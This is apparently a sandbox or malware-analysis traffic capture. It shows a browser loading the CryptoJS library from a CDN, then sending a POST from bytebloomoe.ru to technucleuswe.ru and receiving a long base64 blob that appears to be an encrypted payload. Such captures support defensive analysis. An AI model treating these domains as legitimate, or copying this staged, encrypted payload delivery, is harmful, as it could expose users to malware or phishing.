                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 438876
                            Expires: Sun, 03 Aug 2025 19:58:02 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohdlzWbIZl%2Fs9jrycq9xFMrBABhlCdMjUjusWwc9795%2BJ2FKou8sk5mu1qTpkpryg4rf79uGwi0TLKtKzYIwh0bPNiQYveZKvbS1D8EM2zXorx3FvBG6jG%2BUPRQBbWsZbNCCI9ra"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8b2b47118e7d9e04-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:02 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                            Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                            2024-08-13 19:58:02 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                            Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                            2024-08-13 19:58:02 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                            Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                            2024-08-13 19:58:02 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                            Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                            2024-08-13 19:58:02 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                            Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                            2024-08-13 19:58:02 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                            Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                            2024-08-13 19:58:02 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                            Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                            2024-08-13 19:58:02 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                            Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                            2024-08-13 19:58:02 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                            Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                            2024-08-13 19:58:02 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                            Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.659191188.114.96.34432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:02 UTC604OUTPOST // HTTP/1.1
                            Host: technucleuswe.ru
                            Connection: keep-alive
                            Content-Length: 20
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-platform: "Windows"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Content-Type: text/plain;charset=UTF-8
                            Accept: */*
                            Origin: https://bytebloomoe.ru
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:02 UTC20OUTData Raw: 7b 22 68 61 67 67 61 72 64 22 3a 22 61 62 62 65 73 73 22 7d
                            Data Ascii: {"haggard":"abbess"}
                            2024-08-13 19:58:04 UTC655INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:04 GMT
                            Content-Type: application/json
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BGzziszOA1QG2vBe6wAvlXkK5rS%2BqysxTXA1HCRRskJXg7%2BO%2BZudzZ4W6Fbyhnr12UqjwA0wZ56%2BGUzZGWP%2F55OAV01N902QTgW3X73FnDFep%2Bhxokfx42QFAWtFnFt%2BMgj"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b47137f2e4204-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:04 UTC714INData Raw: 34 39 33 61 0d 0a 7b 22 61 22 3a 22 49 42 74 4f 78 4d 4a 35 4f 64 71 42 4e 52 49 38 73 56 65 66 58 63 4b 31 61 59 4a 79 52 4e 5a 44 38 42 46 33 67 4f 65 55 4a 4f 43 65 66 5a 79 5a 70 49 53 5a 2b 41 49 46 65 5c 2f 4b 58 50 4d 66 4a 5a 41 4a 4b 51 51 36 34 6f 55 62 65 65 34 70 66 7a 32 64 68 5c 2f 78 4c 76 65 72 68 72 74 51 48 64 74 7a 50 55 41 48 4a 35 6d 50 51 39 69 56 6d 67 33 63 30 69 71 34 4c 5a 49 4d 62 32 54 63 67 5c 2f 53 66 31 72 4b 6b 4e 61 6b 47 4a 6b 2b 6f 35 68 6d 6d 57 55 6e 6a 79 45 69 6d 72 68 67 6b 64 51 68 36 6a 33 52 6d 72 4f 78 67 57 64 51 36 63 46 54 4c 49 32 48 79 37 36 59 46 70 79 50 34 55 51 53 2b 62 51 31 4d 54 4b 51 65 69 30 77 75 5c 2f 4d 53 6b 47 6c 36 35 30 6c 79 4a 57 45 64 34 67 5a 46 63 35 78 69 5c 2f 61 6c 75 4e 38 44 61 44
                            Data Ascii: 493a{"a":"IBtOxMJ5OdqBNRI8sVefXcK1aYJyRNZD8BF3gOeUJOCefZyZpISZ+AIFe\/KXPMfJZAJKQQ64oUbee4pfz2dh\/xLverhrtQHdtzPUAHJ5mPQ9iVmg3c0iq4LZIMb2Tcg\/Sf1rKkNakGJk+o5hmmWUnjyEimrhgkdQh6j3RmrOxgWdQ6cFTLI2Hy76YFpyP4UQS+bQ1MTKQei0wu\/MSkGl650lyJWEd4gZFc5xi\/aluN8DaD
                            2024-08-13 19:58:04 UTC1369INData Raw: 4b 7a 53 51 50 2b 6e 70 48 39 74 42 68 71 55 74 36 63 44 68 77 64 69 4c 39 76 47 42 77 47 59 71 74 6f 44 73 4a 6b 6c 72 57 7a 6c 53 42 5c 2f 72 69 43 46 54 67 33 5a 35 49 39 70 59 4e 4e 36 55 4d 6c 66 76 42 30 53 4c 49 56 48 73 69 44 77 31 77 73 70 45 77 55 70 31 45 6f 50 36 49 72 4e 6d 55 44 31 5c 2f 67 68 75 36 66 30 45 33 67 66 4a 4d 33 4e 35 77 68 4c 7a 2b 57 36 6e 62 61 6b 30 42 6e 30 34 37 33 4e 70 75 64 6e 55 45 62 45 6c 55 76 39 70 5a 56 63 6d 6f 33 48 52 63 77 75 2b 32 65 34 62 35 6e 65 79 69 62 5c 2f 52 61 32 45 4f 70 54 49 50 39 55 7a 58 57 69 4e 4d 2b 51 74 62 74 41 35 7a 4b 4c 2b 57 44 55 37 42 6f 36 54 42 69 51 2b 76 57 52 4b 68 41 5c 2f 57 42 4c 71 54 6e 46 75 49 39 37 6e 42 59 52 35 70 52 70 69 6e 79 76 6d 50 5a 70 54 6b 67 76 7a 72 54 58
                            Data Ascii: KzSQP+npH9tBhqUt6cDhwdiL9vGBwGYqtoDsJklrWzlSB\/riCFTg3Z5I9pYNN6UMlfvB0SLIVHsiDw1wspEwUp1EoP6IrNmUD1\/ghu6f0E3gfJM3N5whLz+W6nbak0Bn0473NpudnUEbElUv9pZVcmo3HRcwu+2e4b5neyib\/Ra2EOpTIP9UzXWiNM+QtbtA5zKL+WDU7Bo6TBiQ+vWRKhA\/WBLqTnFuI97nBYR5pRpinyvmPZpTkgvzrTX
                            2024-08-13 19:58:04 UTC1369INData Raw: 41 6c 57 6c 7a 48 31 66 44 35 4d 6c 6d 6d 4d 76 74 4e 71 67 71 72 48 39 44 36 5c 2f 54 70 47 58 53 45 56 2b 74 56 35 45 56 34 6c 50 42 61 2b 74 70 53 47 45 79 74 64 4b 68 62 4a 45 49 59 45 4b 56 52 4d 6a 4d 68 69 35 4a 4e 4d 45 56 72 61 43 4b 46 48 59 43 34 30 73 79 71 70 78 69 43 71 4c 4c 30 32 70 4d 31 44 73 30 73 55 58 51 43 61 76 71 71 79 5c 2f 53 71 58 68 67 65 69 38 70 74 37 36 4b 42 57 4a 4d 51 6c 36 55 58 46 70 6e 70 62 55 35 4b 78 59 45 5a 78 6c 70 53 34 35 44 67 4c 46 49 6d 6b 6e 7a 72 4b 31 47 63 32 67 50 74 49 66 2b 41 2b 38 49 76 6c 6c 71 66 4c 5c 2f 38 75 45 78 68 32 33 5a 34 50 4f 57 4a 71 67 72 49 48 78 4f 64 2b 54 69 59 4e 78 45 61 79 6c 66 37 65 48 79 4a 69 71 70 34 63 72 57 42 4b 4c 64 6e 50 6d 66 6a 33 6c 79 6d 4a 49 6c 4f 44 4f 5a 78
                            Data Ascii: AlWlzH1fD5MlmmMvtNqgqrH9D6\/TpGXSEV+tV5EV4lPBa+tpSGEytdKhbJEIYEKVRMjMhi5JNMEVraCKFHYC40syqpxiCqLL02pM1Ds0sUXQCavqqy\/SqXhgei8pt76KBWJMQl6UXFpnpbU5KxYEZxlpS45DgLFImknzrK1Gc2gPtIf+A+8IvllqfL\/8uExh23Z4POWJqgrIHxOd+TiYNxEaylf7eHyJiqp4crWBKLdnPmfj3lymJIlODOZx
                            2024-08-13 19:58:04 UTC1369INData Raw: 45 74 71 39 61 52 51 63 65 37 47 62 56 54 76 72 4b 6f 78 74 34 59 74 6a 65 43 4f 6b 2b 39 30 42 48 68 76 70 68 30 6e 46 61 54 49 55 32 48 68 43 46 52 57 4e 61 7a 47 69 2b 61 63 31 74 33 5a 75 64 46 52 76 71 79 50 67 49 72 72 4c 49 53 6e 33 55 68 6d 34 37 66 32 6f 7a 50 69 61 61 73 63 55 47 48 51 72 6e 41 71 43 71 48 6c 66 62 58 4a 31 47 62 65 39 64 56 6f 50 45 4a 4e 71 79 70 51 64 44 77 6e 45 4a 67 4d 65 4b 79 6f 36 4c 57 67 59 51 72 6d 4b 35 49 66 6f 55 70 7a 5c 2f 45 39 42 6a 46 59 79 47 33 66 36 33 46 2b 39 7a 50 5a 58 6d 32 69 73 48 46 6d 48 4e 50 56 62 41 73 44 68 42 34 4c 75 64 32 71 55 41 72 5c 2f 61 32 35 58 4b 4e 6c 4c 41 78 33 32 36 41 6d 38 47 6e 54 67 6a 46 57 7a 68 50 6e 6c 7a 6e 5a 4b 48 45 2b 68 2b 38 73 73 56 5c 2f 74 34 39 48 42 31 6e 32
                            Data Ascii: Etq9aRQce7GbVTvrKoxt4YtjeCOk+90BHhvph0nFaTIU2HhCFRWNazGi+ac1t3ZudFRvqyPgIrrLISn3Uhm47f2ozPiaascUGHQrnAqCqHlfbXJ1Gbe9dVoPEJNqypQdDwnEJgMeKyo6LWgYQrmK5IfoUpz\/E9BjFYyG3f63F+9zPZXm2isHFmHNPVbAsDhB4Lud2qUAr\/a25XKNlLAx326Am8GnTgjFWzhPnlznZKHE+h+8ssV\/t49HB1n2
                            2024-08-13 19:58:04 UTC1369INData Raw: 63 49 64 52 67 59 49 67 69 4e 61 47 70 33 68 46 34 56 4d 68 32 66 54 63 78 57 5c 2f 53 32 4a 76 50 55 6c 6e 52 44 78 61 32 75 55 54 62 53 76 62 4c 4d 6a 53 36 45 33 52 4c 75 4b 61 30 34 72 56 4e 44 50 49 30 70 44 4a 38 49 6c 33 6b 6e 6f 70 4d 78 70 7a 56 55 38 47 4d 5a 66 75 58 71 6a 61 33 72 64 55 68 70 67 56 55 58 50 74 7a 52 57 39 6f 34 2b 2b 42 78 34 55 50 35 31 38 4e 72 58 32 69 4f 62 6f 4d 44 30 7a 65 44 50 43 30 44 43 36 6b 79 34 43 4f 4d 30 70 4b 4a 73 4f 41 52 77 56 62 69 4d 46 61 44 45 31 2b 47 55 6d 53 44 31 63 4e 73 2b 37 49 59 34 70 30 4d 6d 54 38 6d 35 5c 2f 35 43 69 48 77 41 57 62 49 49 4e 38 53 4c 39 42 2b 6a 45 43 69 64 47 61 50 58 54 64 76 6a 47 52 6e 4d 6f 58 4e 6c 51 5a 43 50 59 6c 53 4b 4e 71 46 75 71 4f 51 77 37 6f 65 65 63 77 6b 69
                            Data Ascii: cIdRgYIgiNaGp3hF4VMh2fTcxW\/S2JvPUlnRDxa2uUTbSvbLMjS6E3RLuKa04rVNDPI0pDJ8Il3knopMxpzVU8GMZfuXqja3rdUhpgVUXPtzRW9o4++Bx4UP518NrX2iOboMD0zeDPC0DC6ky4COM0pKJsOARwVbiMFaDE1+GUmSD1cNs+7IY4p0MmT8m5\/5CiHwAWbIIN8SL9B+jECidGaPXTdvjGRnMoXNlQZCPYlSKNqFuqOQw7oeecwki
                            2024-08-13 19:58:04 UTC1369INData Raw: 77 49 6a 61 42 71 5c 2f 58 72 6e 79 67 57 62 68 46 5c 2f 48 55 75 71 76 5a 6d 6a 46 66 4d 73 77 57 4b 38 38 78 49 78 30 49 63 71 58 63 49 4b 31 62 7a 4c 77 2b 76 6a 31 65 6b 53 70 58 63 32 48 34 34 31 63 78 44 73 49 52 36 5c 2f 59 33 46 32 59 4e 4a 6a 38 36 69 30 71 34 47 79 65 4a 50 69 44 45 59 63 46 45 4e 36 75 2b 6c 6e 4e 47 57 49 55 79 4f 53 54 51 57 32 68 31 41 48 45 62 5a 33 43 51 70 4f 48 68 35 30 72 54 51 78 5c 2f 4b 4f 6c 4b 4a 5c 2f 70 52 4e 50 31 4c 4e 2b 37 47 68 50 41 74 65 73 54 6a 5c 2f 7a 66 64 54 62 67 43 53 79 58 4c 41 75 57 5c 2f 75 52 32 44 76 53 6d 68 59 49 6c 33 48 37 65 41 66 56 41 68 5c 2f 57 74 78 36 30 6c 55 4f 58 5c 2f 30 63 5a 55 6d 48 66 37 74 54 31 51 31 7a 41 38 4f 77 77 56 71 4b 44 6f 59 30 5c 2f 72 65 77 53 69 48 62 37 68
                            Data Ascii: wIjaBq\/XrnygWbhF\/HUuqvZmjFfMswWK88xIx0IcqXcIK1bzLw+vj1ekSpXc2H441cxDsIR6\/Y3F2YNJj86i0q4GyeJPiDEYcFEN6u+lnNGWIUyOSTQW2h1AHEbZ3CQpOHh50rTQx\/KOlKJ\/pRNP1LN+7GhPAtesTj\/zfdTbgCSyXLAuW\/uR2DvSmhYIl3H7eAfVAh\/Wtx60lUOX\/0cZUmHf7tT1Q1zA8OwwVqKDoY0\/rewSiHb7h
